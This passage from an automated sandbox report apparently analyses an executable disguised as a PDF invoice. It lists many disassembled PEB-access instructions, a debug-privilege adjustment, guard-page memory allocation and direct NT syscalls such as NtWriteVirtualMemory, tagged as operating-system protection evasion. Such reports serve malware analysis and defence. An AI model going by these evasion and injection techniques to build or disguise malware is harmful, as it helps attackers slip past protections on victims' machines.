            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1A2C3 mov eax, dword ptr fs:[00000030h]3_2_01A1A2C3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1A2C3 mov eax, dword ptr fs:[00000030h]3_2_01A1A2C3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE62D6 mov eax, dword ptr fs:[00000030h]3_2_01AE62D6
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0823B mov eax, dword ptr fs:[00000030h]3_2_01A0823B
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A14260 mov eax, dword ptr fs:[00000030h]3_2_01A14260
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A14260 mov eax, dword ptr fs:[00000030h]3_2_01A14260
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A14260 mov eax, dword ptr fs:[00000030h]3_2_01A14260
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0826B mov eax, dword ptr fs:[00000030h]3_2_01A0826B
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A98243 mov eax, dword ptr fs:[00000030h]3_2_01A98243
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A98243 mov ecx, dword ptr fs:[00000030h]3_2_01A98243
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0A250 mov eax, dword ptr fs:[00000030h]3_2_01A0A250
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE625D mov eax, dword ptr fs:[00000030h]3_2_01AE625D
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A16259 mov eax, dword ptr fs:[00000030h]3_2_01A16259
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ACA250 mov eax, dword ptr fs:[00000030h]3_2_01ACA250
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ACA250 mov eax, dword ptr fs:[00000030h]3_2_01ACA250
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A905A7 mov eax, dword ptr fs:[00000030h]3_2_01A905A7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A905A7 mov eax, dword ptr fs:[00000030h]3_2_01A905A7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A905A7 mov eax, dword ptr fs:[00000030h]3_2_01A905A7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A345B1 mov eax, dword ptr fs:[00000030h]3_2_01A345B1
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A345B1 mov eax, dword ptr fs:[00000030h]3_2_01A345B1
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A12582 mov eax, dword ptr fs:[00000030h]3_2_01A12582
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A12582 mov ecx, dword ptr fs:[00000030h]3_2_01A12582
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A44588 mov eax, dword ptr fs:[00000030h]3_2_01A44588
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E59C mov eax, dword ptr fs:[00000030h]3_2_01A4E59C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A125E0 mov eax, dword ptr fs:[00000030h]3_2_01A125E0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]3_2_01A3E5E7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]3_2_01A3E5E7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]3_2_01A3E5E7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]3_2_01A3E5E7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]3_2_01A3E5E7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]3_2_01A3E5E7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]3_2_01A3E5E7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]3_2_01A3E5E7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4C5ED mov eax, dword ptr fs:[00000030h]3_2_01A4C5ED
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4C5ED mov eax, dword ptr fs:[00000030h]3_2_01A4C5ED
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E5CF mov eax, dword ptr fs:[00000030h]3_2_01A4E5CF
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E5CF mov eax, dword ptr fs:[00000030h]3_2_01A4E5CF
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A165D0 mov eax, dword ptr fs:[00000030h]3_2_01A165D0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4A5D0 mov eax, dword ptr fs:[00000030h]3_2_01A4A5D0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4A5D0 mov eax, dword ptr fs:[00000030h]3_2_01A4A5D0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20535 mov eax, dword ptr fs:[00000030h]3_2_01A20535
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20535 mov eax, dword ptr fs:[00000030h]3_2_01A20535
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20535 mov eax, dword ptr fs:[00000030h]3_2_01A20535
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20535 mov eax, dword ptr fs:[00000030h]3_2_01A20535
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20535 mov eax, dword ptr fs:[00000030h]3_2_01A20535
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20535 mov eax, dword ptr fs:[00000030h]3_2_01A20535
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E53E mov eax, dword ptr fs:[00000030h]3_2_01A3E53E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E53E mov eax, dword ptr fs:[00000030h]3_2_01A3E53E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E53E mov eax, dword ptr fs:[00000030h]3_2_01A3E53E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E53E mov eax, dword ptr fs:[00000030h]3_2_01A3E53E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E53E mov eax, dword ptr fs:[00000030h]3_2_01A3E53E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA6500 mov eax, dword ptr fs:[00000030h]3_2_01AA6500
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE4500 mov eax, dword ptr fs:[00000030h]3_2_01AE4500
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE4500 mov eax, dword ptr fs:[00000030h]3_2_01AE4500
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE4500 mov eax, dword ptr fs:[00000030h]3_2_01AE4500
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE4500 mov eax, dword ptr fs:[00000030h]3_2_01AE4500
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE4500 mov eax, dword ptr fs:[00000030h]3_2_01AE4500
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE4500 mov eax, dword ptr fs:[00000030h]3_2_01AE4500
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE4500 mov eax, dword ptr fs:[00000030h]3_2_01AE4500
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4656A mov eax, dword ptr fs:[00000030h]3_2_01A4656A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4656A mov eax, dword ptr fs:[00000030h]3_2_01A4656A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4656A mov eax, dword ptr fs:[00000030h]3_2_01A4656A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A18550 mov eax, dword ptr fs:[00000030h]3_2_01A18550
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A18550 mov eax, dword ptr fs:[00000030h]3_2_01A18550
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A164AB mov eax, dword ptr fs:[00000030h]3_2_01A164AB
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A444B0 mov ecx, dword ptr fs:[00000030h]3_2_01A444B0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9A4B0 mov eax, dword ptr fs:[00000030h]3_2_01A9A4B0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ACA49A mov eax, dword ptr fs:[00000030h]3_2_01ACA49A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A104E5 mov ecx, dword ptr fs:[00000030h]3_2_01A104E5
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0E420 mov eax, dword ptr fs:[00000030h]3_2_01A0E420
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0E420 mov eax, dword ptr fs:[00000030h]3_2_01A0E420
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0E420 mov eax, dword ptr fs:[00000030h]3_2_01A0E420
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0C427 mov eax, dword ptr fs:[00000030h]3_2_01A0C427
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A96420 mov eax, dword ptr fs:[00000030h]3_2_01A96420
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A96420 mov eax, dword ptr fs:[00000030h]3_2_01A96420
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A96420 mov eax, dword ptr fs:[00000030h]3_2_01A96420
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A96420 mov eax, dword ptr fs:[00000030h]3_2_01A96420
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A96420 mov eax, dword ptr fs:[00000030h]3_2_01A96420
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A96420 mov eax, dword ptr fs:[00000030h]3_2_01A96420
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A96420 mov eax, dword ptr fs:[00000030h]3_2_01A96420
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A48402 mov eax, dword ptr fs:[00000030h]3_2_01A48402
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A48402 mov eax, dword ptr fs:[00000030h]3_2_01A48402
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A48402 mov eax, dword ptr fs:[00000030h]3_2_01A48402
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9C460 mov ecx, dword ptr fs:[00000030h]3_2_01A9C460
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3A470 mov eax, dword ptr fs:[00000030h]3_2_01A3A470
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3A470 mov eax, dword ptr fs:[00000030h]3_2_01A3A470
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3A470 mov eax, dword ptr fs:[00000030h]3_2_01A3A470
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E443 mov eax, dword ptr fs:[00000030h]3_2_01A4E443
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E443 mov eax, dword ptr fs:[00000030h]3_2_01A4E443
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E443 mov eax, dword ptr fs:[00000030h]3_2_01A4E443
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E443 mov eax, dword ptr fs:[00000030h]3_2_01A4E443
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E443 mov eax, dword ptr fs:[00000030h]3_2_01A4E443
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E443 mov eax, dword ptr fs:[00000030h]3_2_01A4E443
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E443 mov eax, dword ptr fs:[00000030h]3_2_01A4E443
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E443 mov eax, dword ptr fs:[00000030h]3_2_01A4E443
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3245A mov eax, dword ptr fs:[00000030h]3_2_01A3245A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ACA456 mov eax, dword ptr fs:[00000030h]3_2_01ACA456
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0645D mov eax, dword ptr fs:[00000030h]3_2_01A0645D
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC47A0 mov eax, dword ptr fs:[00000030h]3_2_01AC47A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A107AF mov eax, dword ptr fs:[00000030h]3_2_01A107AF
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB678E mov eax, dword ptr fs:[00000030h]3_2_01AB678E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9E7E1 mov eax, dword ptr fs:[00000030h]3_2_01A9E7E1
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A327ED mov eax, dword ptr fs:[00000030h]3_2_01A327ED
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A327ED mov eax, dword ptr fs:[00000030h]3_2_01A327ED
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A327ED mov eax, dword ptr fs:[00000030h]3_2_01A327ED
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A147FB mov eax, dword ptr fs:[00000030h]3_2_01A147FB
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A147FB mov eax, dword ptr fs:[00000030h]3_2_01A147FB
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1C7C0 mov eax, dword ptr fs:[00000030h]3_2_01A1C7C0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A907C3 mov eax, dword ptr fs:[00000030h]3_2_01A907C3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4C720 mov eax, dword ptr fs:[00000030h]3_2_01A4C720
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4C720 mov eax, dword ptr fs:[00000030h]3_2_01A4C720
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4273C mov eax, dword ptr fs:[00000030h]3_2_01A4273C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4273C mov ecx, dword ptr fs:[00000030h]3_2_01A4273C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4273C mov eax, dword ptr fs:[00000030h]3_2_01A4273C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8C730 mov eax, dword ptr fs:[00000030h]3_2_01A8C730
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4C700 mov eax, dword ptr fs:[00000030h]3_2_01A4C700
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A10710 mov eax, dword ptr fs:[00000030h]3_2_01A10710
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A40710 mov eax, dword ptr fs:[00000030h]3_2_01A40710
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A18770 mov eax, dword ptr fs:[00000030h]3_2_01A18770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4674D mov esi, dword ptr fs:[00000030h]3_2_01A4674D
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4674D mov eax, dword ptr fs:[00000030h]3_2_01A4674D
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4674D mov eax, dword ptr fs:[00000030h]3_2_01A4674D
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A10750 mov eax, dword ptr fs:[00000030h]3_2_01A10750
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9E75D mov eax, dword ptr fs:[00000030h]3_2_01A9E75D
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52750 mov eax, dword ptr fs:[00000030h]3_2_01A52750
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52750 mov eax, dword ptr fs:[00000030h]3_2_01A52750
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtQueryInformationToken: Direct from: 0x76F02CAC
